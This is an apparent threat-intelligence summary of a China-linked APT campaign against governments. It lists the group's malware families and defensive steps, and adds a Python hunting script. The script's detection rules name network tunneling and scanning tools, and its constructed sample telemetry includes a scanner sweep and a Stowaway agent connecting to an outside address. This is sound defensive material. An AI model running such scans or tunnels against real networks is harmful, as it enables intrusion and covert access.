China-Linked UAT-8302 Targets Governments Using Shared APT Malware Across Regions
China-Linked APT UAT-8302 Deploys Shared Malware Against Governments in South America and Eastern Europe
TL;DR Cisco Talos has attributed government-targeting campaigns in South America (since late 2024) and southeastern Europe (2025) to a China-nexus APT group it tracks as UAT-8302. The group deploys malware families including NetDraft (NosyDoor), CloudSorcerer, and VShell, tools also seen with other China-aligned threat clusters, which points to coordinated access to a common toolset. Initial access vectors remain unconfirmed, though exploitation of web application vulnerabilities is suspected.
What happened
A China-nexus APT group tracked by Cisco Talos as UAT-8302 has conducted intrusion campaigns targeting government entities across two regions. Attack activity against South American governments is documented since at least late 2024. A separate wave of targeting hit southeastern European government agencies in 2025.
Cisco Talos researchers Jungsoo An, Asheer Malhotra, and Brandon White published technical findings linking UAT-8302 to a mature post-exploitation toolset. The group's malware arsenal includes tools previously attributed to multiple other China-aligned threat clusters, a pattern indicating either shared access to a common toolset or deliberate collaboration.
The primary backdoor deployed by UAT-8302 is NetDraft, also known as NosyDoor. This .NET-based malware is a C# variant of FINALDRAFT (aka Squidoor), which security vendors have previously linked to threat clusters including Ink Dragon, CL-STA-0049, Earth Alux, Jewelbug, and REF7707. ESET tracks NosyDoor deployments to a separate group it names LongNosedGoblin. The same malware has been observed in attacks on Russian IT organizations by a threat actor known as Erudite Mogwai (also tracked as Space Pirates and Webworm), according to Russian cybersecurity firm Solar.
UAT-8302's operational toolkit extends beyond NetDraft. The group deploys CloudSorcerer, a backdoor observed in Russian-focused attacks since May 2024. Version 3.0 of CloudSorcerer appears in UAT-8302 attack chains. SNOWLIGHT, a VShell stager previously used by UNC5174, UNC6586, and UAT-6382, is part of the group's infrastructure. UAT-8302 has also deployed a Rust-based variant of SNOWLIGHT called SNOWRUST.
Additional malware families in UAT-8302's operations include Deed RAT (aka Snappybee), a successor to ShadowPad, and Zingdoor—both tools previously deployed by Earth Estries in late 2024. Draculoader, a shellcode loader that delivers Crowdoor and HemiGate, has also appeared in UAT-8302 campaigns.
Initial access methods are not definitively known. The attack pattern suggests exploitation of zero-day or N-day vulnerabilities in web applications. Once inside a target network, UAT-8302 operators conduct reconnaissance, deploy open-source scanning tools such as gogo for automated network enumeration, and move laterally. Persistent access is maintained through VShell, with proxy and VPN tools including Stowaway and SoftEther VPN providing tunnels back to operator infrastructure.
The activity reflects a broader trend in the China-nexus threat ecosystem. Trend Micro reported in October 2025 on "Premier Pass-as-a-Service," a model in which Earth Estries obtains initial access to target networks and transfers that access to Earth Naga for exploitation. This partnership is assessed to have operated since at least late 2023. Trend Micro noted that the model provides direct access to critical assets, reducing reconnaissance and lateral movement timelines, and that access appears restricted to a limited circle of actors.
Why it matters
For defenders in government and critical sectors across South America and southeastern Europe, this activity signals a persistent threat from a well-resourced group with access to mature tooling. The use of shared malware families across multiple tracked threat clusters complicates attribution and suggests either coordinated supply of tools or a shared development infrastructure.
The malware families deployed—NetDraft, CloudSorcerer, and VShell—are not commodity tools. Detection requires baseline knowledge of their signatures, behaviors, and command-and-control patterns. Many organizations may lack this telemetry if similar campaigns have not been previously observed in their regions.
The "Premier Pass-as-a-Service" model is operationally significant for SOC teams and network defenders. A group that receives initial access from another actor (Earth Naga, in the case Trend Micro documented) skips its own reconnaissance and exploitation phase and moves directly to post-exploitation. This compressed timeline shortens detection windows and leaves a smaller forensic footprint during the early compromise phases; the first artifact a defender sees may already be a backdoor or a tunneling tool rather than an exploit attempt.
For developers managing web-facing applications in government networks, the suspected reliance on web application vulnerability exploitation, both zero-day and N-day, underscores the need for rapid patch cycles and compensating controls such as Web Application Firewalls (WAFs) and request rate limiting.
Affected systems and CVEs
- NetDraft (NosyDoor)
- CloudSorcerer (version 3.0)
- VShell and SNOWLIGHT stagers
- SNOWRUST (Rust-based SNOWLIGHT variant)
- Deed RAT (Snappybee)
- Zingdoor
- Draculoader
The items above are the malware families observed in UAT-8302 activity, not vulnerable products. No exploited CVE had been identified or disclosed at the time of publication.
What to do
- Monitor for lateral movement and network reconnaissance patterns typical of post-exploitation activity; implement network segmentation to limit attacker movement.
- Hunt for use of open-source scanning tools such as gogo within network logs and process execution telemetry.
- Prioritize patching of N-day vulnerabilities in internet-facing web applications and apply vendor mitigations where a fix is not yet available. Deploy Web Application Firewalls configured to detect exploitation patterns.
- Monitor for proxy and VPN tools including Stowaway and SoftEther VPN at network boundaries and through endpoint controls, and block them where they are not business-approved; SoftEther is legitimate software, so alert on unexpected installs rather than blocking blindly.
- Implement endpoint detection and response (EDR) tooling with signatures or behavioral heuristics for NetDraft, CloudSorcerer, VShell, SNOWLIGHT, SNOWRUST, Deed RAT, Zingdoor, and Draculoader.
- Restrict execution of unsigned or untrusted binaries through application whitelisting to reduce the attack surface for stager deployment.
- Review firewall and proxy logs for command-and-control communication patterns associated with the malware families named above.
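The intrusion chain described above (gogo enumeration, then Stowaway/SoftEther tunnels) and the hunting recommendations in this list can be turned into two concrete checks. The script below is an added example written for this summary, not code from Cisco Talos or from the tools it names. It runs over constructed process-execution events and flow records embedded inline (no real IOCs), and it assumes binary names: gogo as `gogo`/`gogo.exe`, SoftEther's `vpnserver`/`vpnclient`/`vpnbridge`/`vpncmd`, and Stowaway release binaries containing `stowaway` in the file name, plus gogo-style `-ip <CIDR> -p <ports>` arguments. The name-agnostic "scanner-like arguments" rule and the flow fan-out rule go beyond the page's exact wording so that renamed binaries are still caught.

```python
"""Hunt for UAT-8302-style post-exploitation tooling in constructed telemetry.

Two checks over inline sample data (constructed for this example, not real IOCs):
  1. process-execution events: known open-source tool names (gogo scanner,
     SoftEther VPN, Stowaway proxy) plus a name-agnostic "scanner-like" rule for
     renamed binaries that still take a CIDR target and a port list
  2. network flow records: one internal source fanning out to many distinct
     host:port pairs inside a short window, i.e. automated internal enumeration
"""
from collections import defaultdict
import re

# Assumed binary names (rename for your environment):
#   gogo          -> "gogo" / "gogo.exe"
#   SoftEther VPN -> vpnserver, vpnclient, vpnbridge, vpncmd
#   Stowaway      -> release binaries carry "stowaway" in the file name
TOOL_IMAGE_RULES = {
    "gogo scanner":  re.compile(r"(?:^|[\\/])gogo(?:\.exe)?$", re.I),
    "SoftEther VPN": re.compile(r"(?:^|[\\/])vpn(?:server|client|bridge|cmd)(?:\.exe)?$", re.I),
    "Stowaway":      re.compile(r"(?:^|[\\/])[^\\/]*stowaway[^\\/]*$", re.I),
}
# Name-agnostic scanner heuristic: a CIDR target plus a port selector on the
# command line (gogo's -ip/-p style is an assumption) catches renamed copies.
CIDR_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}/\d{1,2}\b")
PORT_ARG_RE = re.compile(r"(?:^|\s)-(?:p|ports?)\s+\S+", re.I)

SAMPLE_PROCESS_EVENTS = [  # constructed telemetry
    {"host": "srv-web-01", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "srv-web-01", "image": r"C:\Windows\Temp\gogo.exe",
     "cmdline": "gogo.exe -ip 10.20.0.0/24 -p top2"},
    {"host": "srv-web-01", "image": r"C:\Windows\Temp\update.exe",   # renamed scanner
     "cmdline": "update.exe -ip 10.20.1.0/24 -p 80,443,445"},
    {"host": "srv-db-02", "image": "/usr/sbin/sshd", "cmdline": "sshd: ops [priv]"},
    {"host": "srv-db-02", "image": "/opt/vpnserver/vpnserver", "cmdline": "vpnserver start"},
    {"host": "srv-db-02", "image": "/tmp/.x/stowaway_agent",
     "cmdline": "stowaway_agent -c 203.0.113.10:8443 -s p4ss"},
]

SAMPLE_FLOWS = (  # constructed: 10.20.0.5 sweeps 60 hosts on 445 in 12 seconds
    [(1000 + i * 0.2, "10.20.0.5", f"10.20.0.{10 + i}", 445) for i in range(60)]
    # benign: a workstation talking to the same two servers all hour
    + [(1000 + i * 30, "10.20.0.6", "10.20.0.100", 443) for i in range(40)]
    + [(1005 + i * 30, "10.20.0.6", "10.20.0.101", 3389) for i in range(40)]
)


def hunt_processes(events):
    """Return one finding per suspicious process event, with the rules that fired."""
    findings = []
    for ev in events:
        image, cmdline = ev["image"], ev.get("cmdline", "")
        reasons = [name for name, rx in TOOL_IMAGE_RULES.items() if rx.search(image)]
        if CIDR_RE.search(cmdline) and PORT_ARG_RE.search(cmdline):
            reasons.append("scanner-like arguments")
        if reasons:
            findings.append({"host": ev["host"], "image": image, "reasons": reasons})
    return findings


def detect_fanout(flows, window_s=60, min_targets=25):
    """Flag sources touching >= min_targets distinct host:port pairs within window_s.

    flows: iterable of (ts_seconds, src_ip, dst_ip, dst_port). A sliding window
    per source means a slow scan spread over hours does not trigger, while a
    gogo-style sweep (dozens of targets in seconds) does.
    """
    by_src = defaultdict(list)
    for ts, src, dst, dport in flows:
        by_src[src].append((ts, (dst, dport)))
    alerts = []
    for src, recs in by_src.items():
        recs.sort()
        seen = defaultdict(int)  # target -> number of flows inside the window
        left = 0
        for ts, target in recs:
            seen[target] += 1
            while ts - recs[left][0] > window_s:  # expire flows older than the window
                old = recs[left][1]
                seen[old] -= 1
                if seen[old] == 0:
                    del seen[old]
                left += 1
            if len(seen) >= min_targets:
                alerts.append({"src": src, "distinct_targets": len(seen), "window_end": ts})
                break  # one alert per source is enough for a hunt
    return alerts


if __name__ == "__main__":
    for f in hunt_processes(SAMPLE_PROCESS_EVENTS):
        print(f"{f['host']}: {f['image']} -> {', '.join(f['reasons'])}")
    for a in detect_fanout(SAMPLE_FLOWS):
        print(f"fan-out from {a['src']}: {a['distinct_targets']} targets by t={a['window_end']}")
```

Feed `hunt_processes` your EDR process-creation events and `detect_fanout` flow or firewall logs; tune `min_targets` and `window_s` against a baseline of your own network before alerting, and treat a hit on `vpnserver` as a "verify it is sanctioned" signal rather than an automatic block.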
Open questions
- What initial access vectors does UAT-8302 employ beyond the suspected web application exploitation?
- Which specific government entities in South America and southeastern Europe have been targeted?
- What is the full scope of the "Premier Pass-as-a-Service" model, and how many threat actors participate in it?
- Was UAT-8302 still actively operating at the time of the Cisco Talos publication?
- Do NetDraft and the other malware families share development infrastructure, or are they distributed through a supply chain common to multiple China-nexus groups?
Source
China-Linked UAT-8302 Targets Governments Using Shared APT Malware Across Regions


